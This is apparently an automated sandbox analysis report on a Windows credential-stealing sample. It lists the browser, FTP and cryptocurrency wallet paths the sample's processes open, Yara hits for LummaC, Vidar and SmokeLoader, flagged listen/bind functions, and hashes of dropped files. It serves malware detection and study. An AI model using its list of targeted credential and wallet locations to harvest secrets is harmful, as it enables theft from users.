Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Searches for user specific document files

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Directory queried: C:\Users\user\Documents

Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0D60 sqlite3_bind_parameter_name,	12_2_6D1A0D60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0C40 sqlite3_bind_zeroblob,	12_2_6D1A0C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C8EA0 sqlite3_clear_bindings,	12_2_6D0C8EA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	12_2_6D1A0B40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C6410 bind,WSAGetLastError,	12_2_6D0C6410
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0CC030 sqlite3_bind_parameter_count,	12_2_6D0CC030
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0CC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	12_2_6D0CC050
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C6070 PR_Listen,	12_2_6D0C6070
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C60B0 listen,WSAGetLastError,	12_2_6D0C60B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C63C0 PR_Bind,	12_2_6D0C63C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0522D0 sqlite3_bind_blob,	12_2_6D0522D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C9400 sqlite3_bind_int64,	12_2_6D0C9400

Windows Analysis Report
xvJv1BpknZ.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1448044
Product:	CloudBasic
Start time:	15:22:07
Start date:	27.05.2024
Sample:	xvJv1BpknZ.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c5261e67bd6d58771e27d7214e8f1c8f
SHA1:	6fd857b3ebdb3888785d41f20277bc4e045bf704
SHA256:	09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\FBGIDHCAAKEB\AEBKEC	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\FBGIDHCAAKEB\BFIIID	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\FBGIDHCAAKEB\DAKEHI	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	BE99679A2B018331EACD3A1B680E3757	6E6732E173C91B0C3287AB4B161FE3676D33449A	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
C:\ProgramData\FBGIDHCAAKEB\ECAEGH	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\FBGIDHCAAKEB\GHDBAF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	64BCCF32ED2142E76D142DF7AAC75730	30AB1540F7909BEE86C0542B2EBD24FB73E5D629	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
C:\ProgramData\FBGIDHCAAKEB\GIEBAE	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\FBGIDHCAAKEB\HIJJEG	ASCII text, with very long lines (1765), with CRLF line terminators	42594FD09C4DF3B174CF5D59B1CAB13A	1B78FEB748C36A592C468A76BB60E98187D7BE4A	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
C:\ProgramData\FBGIDHCAAKEB\IDGDAA	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\FBGIDHCAAKEB\IEBAAF	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	EFD26666EAE0E87B32082FF52F9F4C5E	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
C:\ProgramData\FBGIDHCAAKEB\JJDBFC	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\FBGIDHCAAKEB\JJDBFC-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\FBGIDHCAAKEB\JKEBFB	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	85D6E1D7F82C11DAC40C95C06B7B5DC5	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
C:\ProgramData\FBGIDHCAAKEB\JKEBFB-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\FBGIDHCAAKEB\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\FBGIDHCAAKEB\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\FBGIDHCAAKEB\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\FBGIDHCAAKEB\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\FBGIDHCAAKEB\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\FBGIDHCAAKEB\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5876.exe_bb83caaba8bfb67bcd28d62359ef968548a83a_8606972a_f768a413-62bc-4891-a9fa-1e0424f3e302\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	786F63462E99D2BF3027FDBF4495F269	34B52718B24DB9B0E1460150F7061B069B8A103D	DE4D918DE3DA1FB57AFD4DCA8357B0F4D92F7433BA69D2ECE16F09DEF89ED851
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREDB1.tmp.dmp	Mini DuMP crash report, 15 streams, Mon May 27 13:24:12 2024, 0x1205a4 type	2E50EDEE7198D33D7A36C86808DA9FF2	A922287D5961B13A065A6C4AE6DCFE97AAF1A25B	2CFE65C223CA8B53B4F95BA9CCE3AD95AF057ED7486CBB59C771A1F1CA841DE7
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE9D.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	C8FDC58DE8E53FCBDE4EDB0D37AA8883	30401CDFB22C4A31D0A0A292155C640C5FAE36EB	68D069DB4C002BB1B7B5DD0E99D46139E29D6BA4D7E358BA33A1C4D3ED0B9145
C:\ProgramData\Microsoft\Windows\WER\Temp\WEREECC.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	6C1B396C28BA364712EDC55A278F2A1A	5F987F91D3E26E34EC785FF4BB0596C22A6D6A15	E985BFA270750223B10BBAA3A16F0EF131186C1D0A4373119800B05612C698D4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\76561199689717899[1].htm	HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators	7B0EEDEC48F503315B5CF087431E0D0F	4E7974CED987745BEC806059487A9FAEBF8316A2	5F0DFC751086A00F2A6FEE6BF23BECF777AFDE0FAD352CC27D746EB6AE5D7288
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
